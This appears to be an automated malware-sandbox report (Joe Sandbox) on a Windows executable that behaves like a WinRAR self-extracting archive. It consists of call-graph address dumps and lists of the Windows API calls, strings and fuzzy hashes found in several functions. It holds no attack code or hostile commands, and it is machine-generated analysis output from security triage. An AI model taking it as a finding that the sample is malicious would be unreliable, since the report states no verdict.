23964 f39ebf SetEndOfFile 23727->23964 23730 f391b1 23728->23730 23937 f39d62 23729->23937 23730->23736 23965 f31f94 74 API calls 23730->23965 23733 f3914b 23734 f396d0 75 API calls 23733->23734 23734->23726 23736->23682 23738 f31643 23737->23738 23980 f3c8ca 23738->23980 23741->23597 23742->23594 23744 f3b087 __EH_prolog 23743->23744 23749 f3ea80 80 API calls 23744->23749 23746 f3b099 23750 f3b195 23746->23750 23749->23746 23751 f3b1a7 ___scrt_fastfail 23750->23751 23754 f40948 23751->23754 23757 f40908 GetCurrentProcess GetProcessAffinityMask 23754->23757 23758 f3b10f 23757->23758 23758->23616 23759->23620 23765 f316d2 23760->23765 23762 f370b9 23762->23632 23763->23634 23764->23635 23766 f316e8 23765->23766 23777 f31740 __vswprintf_c_l 23765->23777 23767 f31711 23766->23767 23778 f36e91 74 API calls __vswprintf_c_l 23766->23778 23768 f31767 23767->23768 23769 f3172d new 23767->23769 23772 f535de 22 API calls 23768->23772 23769->23777 23780 f36efd 75 API calls 23769->23780 23771 f31707 23779 f36efd 75 API calls 23771->23779 23774 f3176e 23772->23774 23774->23777 23781 f36efd 75 API calls 23774->23781 23777->23762 23778->23771 23779->23767 23780->23777 23781->23777 23783 f40c56 __vswprintf_c_l 23782->23783 23783->23639 23785 f3195d 23784->23785 23786 f31961 23784->23786 23785->23641 23788 f31896 23786->23788 23789 f318a8 23788->23789 23790 f318e5 23788->23790 23791 f33aac 97 API calls 23789->23791 23796 f33f18 23790->23796 23794 f318c8 23791->23794 23794->23785 23800 f33f21 23796->23800 23797 f33aac 97 API calls 23797->23800 23798 f31906 23798->23794 23801 f31e00 23798->23801 23800->23797 23800->23798 23813 f4067c 23800->23813 23802 f31e0a __EH_prolog 23801->23802 23821 f33b3d 23802->23821 23804 f31e34 23805 f316d2 76 API calls 23804->23805 23807 f31ebb 23804->23807 23806 f31e4b 23805->23806 23849 f31849 76 API calls 23806->23849 23807->23794 23809 f31e63 23811 f31e6f 23809->23811 23850 f4137a MultiByteToWideChar 23809->23850 23851 f31849 76 API calls 23811->23851 
23814 f40683 23813->23814 23815 f4069e 23814->23815 23819 f36e8c RaiseException Concurrency::cancel_current_task 23814->23819 23817 f406af SetThreadExecutionState 23815->23817 23820 f36e8c RaiseException Concurrency::cancel_current_task 23815->23820 23817->23800 23819->23815 23820->23817 23822 f33b47 __EH_prolog 23821->23822 23823 f33b79 23822->23823 23824 f33b5d 23822->23824 23825 f33dc2 23823->23825 23829 f33ba5 23823->23829 23880 f36dc1 74 API calls 23824->23880 23897 f36dc1 74 API calls 23825->23897 23828 f33b68 23828->23804 23829->23828 23852 f42c42 23829->23852 23831 f33c26 23832 f33cb1 23831->23832 23848 f33c1d 23831->23848 23883 f3c991 23831->23883 23865 f3aa88 23832->23865 23833 f33c22 23833->23831 23882 f32034 76 API calls 23833->23882 23835 f33c12 23881 f36dc1 74 API calls 23835->23881 23836 f33bf4 23836->23831 23836->23833 23836->23835 23841 f33cc4 23842 f33d48 23841->23842 23843 f33d3e 23841->23843 23889 f428f1 121 API calls 23842->23889 23869 f392e6 23843->23869 23846 f33d46 23846->23848 23890 f31f94 74 API calls 23846->23890 23891 f41acf 23848->23891 23849->23809 23850->23811 23851->23807 23853 f42c51 23852->23853 23855 f42c5b 23852->23855 23898 f36efd 75 API calls 23853->23898 23856 f42ca2 new 23855->23856 23857 f42c9d Concurrency::cancel_current_task 23855->23857 23864 f42cfd ___scrt_fastfail 23855->23864 23859 f42da9 Concurrency::cancel_current_task 23856->23859 23860 f42cd9 23856->23860 23856->23864 23900 f5157a RaiseException 23857->23900 23901 f5157a RaiseException 23859->23901 23899 f42b7b 75 API calls 3 library calls 23860->23899 23863 f42dc1 23864->23836 23866 f3aa9f 23865->23866 23867 f3aa95 23865->23867 23866->23841 23868 f4e24a new 8 API calls 23867->23868 23868->23866 23870 f392f0 __EH_prolog 23869->23870 23902 f37dc6 23870->23902 23873 f3709d 76 API calls 23874 f39302 23873->23874 23905 f3ca6c 23874->23905 23876 f3935c 23876->23846 23878 f3ca6c 114 API calls 23879 f39314 23878->23879 23879->23876 23879->23878 23914 f3cc51 97 API calls 
__vswprintf_c_l 23879->23914 23880->23828 23881->23848 23882->23831 23884 f3c9b2 23883->23884 23885 f3c9c4 23883->23885 23915 f36249 80 API calls 23884->23915 23916 f36249 80 API calls 23885->23916 23888 f3c9bc 23888->23832 23889->23846 23890->23848 23893 f41ad9 23891->23893 23892 f41af2 23917 f4075b 84 API calls 23892->23917 23893->23892 23896 f41b06 23893->23896 23895 f41af9 23895->23896 23897->23828 23898->23855 23899->23864 23900->23859 23901->23863 23903 f3acf5 GetVersionExW 23902->23903 23904 f37dcb 23903->23904 23904->23873 23912 f3ca82 __vswprintf_c_l 23905->23912 23906 f3cbf7 23907 f3cc1f 23906->23907 23908 f3ca0b 6 API calls 23906->23908 23909 f4067c SetThreadExecutionState RaiseException 23907->23909 23908->23907 23910 f3cbee 23909->23910 23910->23879 23911 f484bd 99 API calls 23911->23912 23912->23906 23912->23910 23912->23911 23913 f3ab70 89 API calls 23912->23913 23913->23912 23914->23879 23915->23888 23916->23888 23917->23895 23918->23651 23919->23651 23920->23652 23922 f35e4a 23921->23922 23966 f35d67 23922->23966 23925 f35e7d 23926 f35eb5 23925->23926 23971 f3ad65 CharUpperW CompareStringW 23925->23971 23926->23665 23929 f38289 23927->23929 23977 f4179d CharUpperW 23929->23977 23930 f38333 23930->23668 23932 f37d7b 23931->23932 23933 f37dbb 23932->23933 23978 f37043 74 API calls 23932->23978 23933->23675 23935 f37db3 23979 f36dc1 74 API calls 23935->23979 23938 f39d73 23937->23938 23941 f39d82 23937->23941 23939 f39d79 FlushFileBuffers 23938->23939 23938->23941 23939->23941 23940 f39dfb SetFileTime 23940->23733 23941->23940 23942->23656 23943->23658 23944->23664 23945->23675 23946->23675 23947->23672 23948->23689 23949->23680 23950->23689 23952 f39992 GetFileType 23951->23952 23953 f3998f 23951->23953 23954 f399a0 23952->23954 23953->23693 23954->23693 23955->23699 23956->23687 23957->23701 23958->23724 23959->23724 23960->23724 23961->23724 23962->23724 23963->23727 23964->23729 23965->23736 23972 f35c64 23966->23972 23968 f35d88 23968->23925 
23970 f35c64 2 API calls 23970->23968 23971->23925 23973 f35c6e 23972->23973 23975 f35d56 23973->23975 23976 f3ad65 CharUpperW CompareStringW 23973->23976 23975->23968 23975->23970 23976->23973 23977->23930 23978->23935 23979->23933 23981 f3c8db 23980->23981 23986 f3a90e 84 API calls 23981->23986 23983 f3c90d 23987 f3a90e 84 API calls 23983->23987 23985 f3c918 23986->23983 23987->23985 23989 f3a5fe 23988->23989 23990 f3a691 FindNextFileW 23989->23990 23991 f3a621 FindFirstFileW 23989->23991 23993 f3a6b0 23990->23993 23994 f3a69c GetLastError 23990->23994 23992 f3a638 23991->23992 23999 f3a675 23991->23999 23995 f3b66c 2 API calls 23992->23995 23993->23999 23994->23993 23996 f3a64d 23995->23996 23997 f3a651 FindFirstFileW 23996->23997 23998 f3a66a GetLastError 23996->23998 23997->23998 23997->23999 23998->23999 23999->23605 24009 f49d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24000->24009 24002 f49d21 24003 f49d2d 24002->24003 24010 f49d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24002->24010 24003->23354 24003->23355 24005->23360 24006->23364 24007->23364 24008->23367 24009->24002 24010->24003 24011->23373 24013 f39ef7 76 API calls 24012->24013 24014 f31f5b 24013->24014 24015 f319a6 97 API calls 24014->24015 24018 f31f78 24014->24018 24016 f31f68 24015->24016 24016->24018 24019 f36dc1 74 API calls 24016->24019 24018->23381 24018->23382 24019->24018 24814 f4b8e0 93 API calls _swprintf 24815 f48ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24818 f616e0 CloseHandle 24819 f4acd0 100 API calls 24866 f419d0 26 API calls std::bad_exception::bad_exception 24025 f310d5 24030 f35bd7 24025->24030 24031 f35be1 __EH_prolog 24030->24031 24032 f3b07d 82 API calls 24031->24032 24033 f35bed 24032->24033 24037 f35dcc GetCurrentProcess GetProcessAffinityMask 24033->24037 24038 f4ead2 24039 f4eade ___BuildCatchObject 24038->24039 24064 f4e5c7 24039->24064 24041 f4eae5 24043 f4eb0e 24041->24043 24144 f4ef05 IsProcessorFeaturePresent 
IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24041->24144 24047 f4eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24043->24047 24075 f5824d 24043->24075 24049 f4ebad 24047->24049 24145 f57243 38 API calls 2 library calls 24047->24145 24048 f4eb2d ___BuildCatchObject 24083 f4f020 24049->24083 24059 f4ebd9 24061 f4ebe2 24059->24061 24146 f5764a 28 API calls _abort 24059->24146 24147 f4e73e 13 API calls 2 library calls 24061->24147 24065 f4e5d0 24064->24065 24148 f4ed5b IsProcessorFeaturePresent 24065->24148 24067 f4e5dc 24149 f52016 24067->24149 24069 f4e5e1 24070 f4e5e5 24069->24070 24158 f580d7 24069->24158 24070->24041 24073 f4e5fc 24073->24041 24078 f58264 24075->24078 24076 f4ec4a TranslatorGuardHandler 5 API calls 24077 f4eb27 24076->24077 24077->24048 24079 f581f1 24077->24079 24078->24076 24082 f58220 24079->24082 24080 f4ec4a TranslatorGuardHandler 5 API calls 24081 f58249 24080->24081 24081->24047 24082->24080 24208 f4f350 24083->24208 24086 f4ebb3 24087 f5819e 24086->24087 24210 f5b290 24087->24210 24089 f4ebbc 24092 f4d5d4 24089->24092 24091 f581a7 24091->24089 24214 f5b59a 38 API calls 24091->24214 24349 f400cf 24092->24349 24096 f4d5f3 24398 f4a335 24096->24398 24098 f4d5fc 24402 f413b3 GetCPInfo 24098->24402 24100 f4d606 ___scrt_fastfail 24101 f4d619 GetCommandLineW 24100->24101 24102 f4d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24101->24102 24103 f4d628 24101->24103 24104 f3400a _swprintf 51 API calls 24102->24104 24405 f4bc84 24103->24405 24106 f4d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24104->24106 24416 f4aded LoadBitmapW 24106->24416 24109 f4d636 OpenFileMappingW 24111 f4d696 CloseHandle 24109->24111 24112 f4d64f MapViewOfFile 24109->24112 24110 f4d6a0 24410 f4d287 24110->24410 24111->24102 24115 f4d660 __vswprintf_c_l 24112->24115 24116 f4d68d UnmapViewOfFile 24112->24116 24121 f4d287 2 API calls 24115->24121 24116->24111 24123 f4d67c 
24121->24123 24122 f48835 8 API calls 24124 f4d76a DialogBoxParamW 24122->24124 24123->24116 24125 f4d7a4 24124->24125 24126 f4d7b6 Sleep 24125->24126 24127 f4d7bd 24125->24127 24126->24127 24129 f4d7cb 24127->24129 24446 f4a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24127->24446 24130 f4d7ea DeleteObject 24129->24130 24131 f4d806 24130->24131 24132 f4d7ff DeleteObject 24130->24132 24133 f4d837 24131->24133 24134 f4d849 24131->24134 24132->24131 24447 f4d2e6 6 API calls 24133->24447 24443 f4a39d 24134->24443 24137 f4d83d CloseHandle 24137->24134 24138 f4d883 24139 f5757e GetModuleHandleW 24138->24139 24140 f4ebcf 24139->24140 24140->24059 24141 f576a7 24140->24141 24581 f57424 24141->24581 24144->24041 24145->24049 24146->24061 24147->24048 24148->24067 24150 f5201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24149->24150 24162 f5310e 24150->24162 24153 f52029 24153->24069 24155 f52031 24156 f5203c 24155->24156 24176 f5314a DeleteCriticalSection 24155->24176 24156->24069 24204 f5b73a 24158->24204 24161 f5203f 8 API calls 3 library calls 24161->24070 24163 f53117 24162->24163 24165 f53140 24163->24165 24166 f52025 24163->24166 24177 f53385 24163->24177 24182 f5314a DeleteCriticalSection 24165->24182 24166->24153 24168 f5215c 24166->24168 24197 f5329a 24168->24197 24170 f52166 24175 f52171 24170->24175 24202 f53348 6 API calls try_get_function 24170->24202 24172 f5217f 24173 f5218c 24172->24173 24203 f5218f 6 API calls ___vcrt_FlsFree 24172->24203 24173->24155 24175->24155 24176->24153 24183 f53179 24177->24183 24180 f533bc InitializeCriticalSectionAndSpinCount 24181 f533a8 24180->24181 24181->24163 24182->24166 24184 f531ad 24183->24184 24187 f531a9 24183->24187 24184->24180 24184->24181 24185 f531cd 24185->24184 24188 f531d9 GetProcAddress 24185->24188 24187->24184 24187->24185 24190 f53219 24187->24190 24189 f531e9 __crt_fast_encode_pointer 24188->24189 24189->24184 24191 f53241 LoadLibraryExW 24190->24191 24195 
f53236 24190->24195 24192 f53275 24191->24192 24193 f5325d GetLastError 24191->24193 24192->24195 24196 f5328c FreeLibrary 24192->24196 24193->24192 24194 f53268 LoadLibraryExW 24193->24194 24194->24192 24195->24187 24196->24195 24198 f53179 try_get_function 5 API calls 24197->24198 24199 f532b4 24198->24199 24200 f532cc TlsAlloc 24199->24200 24201 f532bd 24199->24201 24201->24170 24202->24172 24203->24175 24207 f5b753 24204->24207 24205 f4ec4a TranslatorGuardHandler 5 API calls 24206 f4e5ee 24205->24206 24206->24073 24206->24161 24207->24205 24209 f4f033 GetStartupInfoW 24208->24209 24209->24086 24211 f5b299 24210->24211 24212 f5b2a2 24210->24212 24215 f5b188 24211->24215 24212->24091 24214->24091 24216 f58fa5 _abort 38 API calls 24215->24216 24217 f5b195 24216->24217 24235 f5b2ae 24217->24235 24219 f5b19d 24244 f5af1b 24219->24244 24222 f5b1b4 24222->24212 24223 f58518 __onexit 21 API calls 24224 f5b1c5 24223->24224 24231 f5b1f7 24224->24231 24251 f5b350 24224->24251 24227 f584de _free 20 API calls 24227->24222 24228 f5b1f2 24261 f5895a 20 API calls __dosmaperr 24228->24261 24229 f5b20f 24232 f5b23b 24229->24232 24233 f584de _free 20 API calls 24229->24233 24231->24227 24232->24231 24262 f5adf1 26 API calls 24232->24262 24233->24232 24236 f5b2ba ___BuildCatchObject 24235->24236 24237 f58fa5 _abort 38 API calls 24236->24237 24242 f5b2c4 24237->24242 24239 f5b348 ___BuildCatchObject 24239->24219 24242->24239 24243 f584de _free 20 API calls 24242->24243 24263 f58566 38 API calls _abort 24242->24263 24264 f5a3f1 EnterCriticalSection 24242->24264 24265 f5b33f LeaveCriticalSection _abort 24242->24265 24243->24242 24245 f53dd6 __cftof 38 API calls 24244->24245 24246 f5af2d 24245->24246 24247 f5af3c GetOEMCP 24246->24247 24248 f5af4e 24246->24248 24249 f5af65 24247->24249 24248->24249 24250 f5af53 GetACP 24248->24250 24249->24222 24249->24223 24250->24249 24252 f5af1b 40 API calls 24251->24252 24253 f5b36f 24252->24253 24256 f5b3c0 IsValidCodePage 24253->24256 24258 
f5b376 24253->24258 24260 f5b3e5 ___scrt_fastfail 24253->24260 24254 f4ec4a TranslatorGuardHandler 5 API calls 24255 f5b1ea 24254->24255 24255->24228 24255->24229 24257 f5b3d2 GetCPInfo 24256->24257 24256->24258 24257->24258 24257->24260 24258->24254 24266 f5aff4 GetCPInfo 24260->24266 24261->24231 24262->24231 24264->24242 24265->24242 24270 f5b02e 24266->24270 24275 f5b0d8 24266->24275 24269 f4ec4a TranslatorGuardHandler 5 API calls 24272 f5b184 24269->24272 24276 f5c099 24270->24276 24272->24258 24274 f5a275 __vswprintf_c_l 43 API calls 24274->24275 24275->24269 24277 f53dd6 __cftof 38 API calls 24276->24277 24278 f5c0b9 MultiByteToWideChar 24277->24278 24280 f5c0f7 24278->24280 24288 f5c18f 24278->24288 24282 f5c118 __vsnwprintf_l ___scrt_fastfail 24280->24282 24283 f58518 __onexit 21 API calls 24280->24283 24281 f4ec4a TranslatorGuardHandler 5 API calls 24284 f5b08f 24281->24284 24285 f5c189 24282->24285 24287 f5c15d MultiByteToWideChar 24282->24287 24283->24282 24290 f5a275 24284->24290 24295 f5a2c0 20 API calls _free 24285->24295 24287->24285 24289 f5c179 GetStringTypeW 24287->24289 24288->24281 24289->24285 24291 f53dd6 __cftof 38 API calls 24290->24291 24292 f5a288 24291->24292 24296 f5a058 24292->24296 24295->24288 24297 f5a073 __vswprintf_c_l 24296->24297 24298 f5a099 MultiByteToWideChar 24297->24298 24299 f5a24d 24298->24299 24300 f5a0c3 24298->24300 24301 f4ec4a TranslatorGuardHandler 5 API calls 24299->24301 24303 f58518 __onexit 21 API calls 24300->24303 24305 f5a0e4 __vsnwprintf_l 24300->24305 24302 f5a260 24301->24302 24302->24274 24303->24305 24304 f5a12d MultiByteToWideChar 24306 f5a146 24304->24306 24319 f5a199 24304->24319 24305->24304 24305->24319 24323 f5a72c 24306->24323 24310 f5a170 24314 f5a72c __vswprintf_c_l 11 API calls 24310->24314 24310->24319 24311 f5a1a8 24312 f5a1c9 __vsnwprintf_l 24311->24312 24315 f58518 __onexit 21 API calls 24311->24315 24313 f5a23e 24312->24313 24316 f5a72c __vswprintf_c_l 11 API calls 24312->24316 24331 
f5a2c0 20 API calls _free 24313->24331 24314->24319 24315->24312 24318 f5a21d 24316->24318 24318->24313 24320 f5a22c WideCharToMultiByte 24318->24320 24332 f5a2c0 20 API calls _free 24319->24332 24320->24313 24321 f5a26c 24320->24321 24333 f5a2c0 20 API calls _free 24321->24333 24334 f5a458 24323->24334 24327 f5a79c LCMapStringW 24328 f5a75c 24327->24328 24329 f4ec4a TranslatorGuardHandler 5 API calls 24328->24329 24330 f5a15d 24329->24330 24330->24310 24330->24311 24330->24319 24331->24319 24332->24299 24333->24319 24335 f5a488 24334->24335 24339 f5a484 24334->24339 24335->24328 24341 f5a7b4 10 API calls 3 library calls 24335->24341 24336 f5a4a8 24336->24335 24338 f5a4b4 GetProcAddress 24336->24338 24340 f5a4c4 __crt_fast_encode_pointer 24338->24340 24339->24335 24339->24336 24342 f5a4f4 24339->24342 24340->24335 24341->24327 24343 f5a515 LoadLibraryExW 24342->24343 24344 f5a50a 24342->24344 24345 f5a532 GetLastError 24343->24345 24347 f5a54a 24343->24347 24344->24339 24346 f5a53d LoadLibraryExW 24345->24346 24345->24347 24346->24347 24347->24344 24348 f5a561 FreeLibrary 24347->24348 24348->24344 24350 f4e360 24349->24350 24351 f400d9 GetModuleHandleW 24350->24351 24352 f40154 24351->24352 24353 f400f0 GetProcAddress 24351->24353 24354 f40484 GetModuleFileNameW 24352->24354 24457 f570dd 42 API calls 2 library calls 24352->24457 24355 f40121 GetProcAddress 24353->24355 24356 f40109 24353->24356 24367 f404a3 24354->24367 24355->24352 24358 f40133 24355->24358 24356->24355 24358->24352 24359 f403be 24359->24354 24360 f403c9 GetModuleFileNameW CreateFileW 24359->24360 24361 f403fc SetFilePointer 24360->24361 24362 f40478 CloseHandle 24360->24362 24361->24362 24363 f4040c ReadFile 24361->24363 24362->24354 24363->24362 24365 f4042b 24363->24365 24365->24362 24369 f40085 2 API calls 24365->24369 24368 f404d2 CompareStringW 24367->24368 24370 f40508 GetFileAttributesW 24367->24370 24371 f40520 24367->24371 24448 f3acf5 24367->24448 24451 f40085 24367->24451 24368->24367 

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00F400CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00F400E4
                    • Part of subcall function 00F400CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F400F6
                    • Part of subcall function 00F400CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F40127
                    • Part of subcall function 00F49DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F49DAC
                    • Part of subcall function 00F4A335: OleInitialize.OLE32(00000000), ref: 00F4A34E
                    • Part of subcall function 00F4A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F4A385
                    • Part of subcall function 00F4A335: SHGetMalloc.SHELL32(00F78430), ref: 00F4A38F
                    • Part of subcall function 00F413B3: GetCPInfo.KERNEL32(00000000,?), ref: 00F413C4
                    • Part of subcall function 00F413B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00F413D8
                  • GetCommandLineW.KERNEL32 ref: 00F4D61C
                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F4D643
                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F4D654
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00F4D68E
                    • Part of subcall function 00F4D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F4D29D
                    • Part of subcall function 00F4D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F4D2D9
                  • CloseHandle.KERNEL32(00000000), ref: 00F4D697
                  • GetModuleFileNameW.KERNEL32(00000000,00F8DC90,00000800), ref: 00F4D6B2
                  • SetEnvironmentVariableW.KERNEL32(sfxname,00F8DC90), ref: 00F4D6BE
                  • GetLocalTime.KERNEL32(?), ref: 00F4D6C9
                  • _swprintf.LIBCMT ref: 00F4D708
                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F4D71A
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00F4D721
                  • LoadIconW.USER32(00000000,00000064), ref: 00F4D738
                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00F4D789
                  • Sleep.KERNEL32(?), ref: 00F4D7B7
                  • DeleteObject.GDI32 ref: 00F4D7F0
                  • DeleteObject.GDI32(?), ref: 00F4D800
                  • CloseHandle.KERNEL32 ref: 00F4D843
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                  • API String ID: 788466649-2656992072
                  • Opcode ID: 76f73c702049c72f0b4470e3c0405bde63e37e1948b1374aaacfe40b9491a17f
                  • Instruction ID: 08e281825af044ba9c5df395266c3ed92935244d95747fd86318bc273cebb031
                  • Opcode Fuzzy Hash: 76f73c702049c72f0b4470e3c0405bde63e37e1948b1374aaacfe40b9491a17f
                  • Instruction Fuzzy Hash: 5C61E371D40249BFD320AFA5EC49F7A3BA8AB45754F000429F949D31A2EFB8D944F762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • FindResourceW.KERNEL32(00F4AE4D,PNG,?,?,?,00F4AE4D,00000066), ref: 00F49E2E
                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E46
                  • LoadResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E59
                  • LockResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E64
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F4AE4D,00000066), ref: 00F49E82
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00F4AE4D,00000066), ref: 00F49E93
                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F49EFC
                  • GlobalUnlock.KERNEL32(00000000), ref: 00F49F1B
                  • GlobalFree.KERNEL32(00000000), ref: 00F49F22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                  • String ID: PNG
                  • API String ID: 4097654274-364855578
                  • Opcode ID: 896d4dc60493b52d99460a5d5f6096974fb9236ca0170904ea963adb23ba2a49
                  • Instruction ID: d03ccc11ca995324098c737cd9cd5219284d470e26d9ee914551606004d6c62c
                  • Opcode Fuzzy Hash: 896d4dc60493b52d99460a5d5f6096974fb9236ca0170904ea963adb23ba2a49
                  • Instruction Fuzzy Hash: 49318171A0830AAFD7109F61DC4891BBFADFF86761B040529FC16D3260DBB6DC44AA61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A628
                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A65E
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A66A
                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A692
                  • GetLastError.KERNEL32(?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A69E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileFind$ErrorFirstLast$Next
                  • String ID:
                  • API String ID: 869497890-0
                  • Opcode ID: 3772faa530d8aca7b73fdef26cdd2d25af76461255121fadeb452338eb66cca6
                  • Instruction ID: 08e578c4824f25373b223ae7d12fccf0121f1b1d23e0c8e841843bf6cb0433ab
                  • Opcode Fuzzy Hash: 3772faa530d8aca7b73fdef26cdd2d25af76461255121fadeb452338eb66cca6
                  • Instruction Fuzzy Hash: A041A772504245AFC320EF78CCC5ADAF7E8BF49364F040929F6E9D3210D774A958AB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002,00000000), ref: 00F5755E
                  • TerminateProcess.KERNEL32(00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002,00000000), ref: 00F57565
                  • ExitProcess.KERNEL32 ref: 00F57577
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 04c4d292d250e0fc0e6dfd26a4c18646a7ffe0cad92abf3700b681e951fce1fb
                  • Instruction ID: 85914d2e774edf891288d32a58a144e5cba086cce29863669f4381f137e3b509
                  • Opcode Fuzzy Hash: 04c4d292d250e0fc0e6dfd26a4c18646a7ffe0cad92abf3700b681e951fce1fb
                  • Instruction Fuzzy Hash: 6CE04631800A08ABCF11BF24ED08A493B29EB00352F148014FE158A222DB79DE4AEA50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
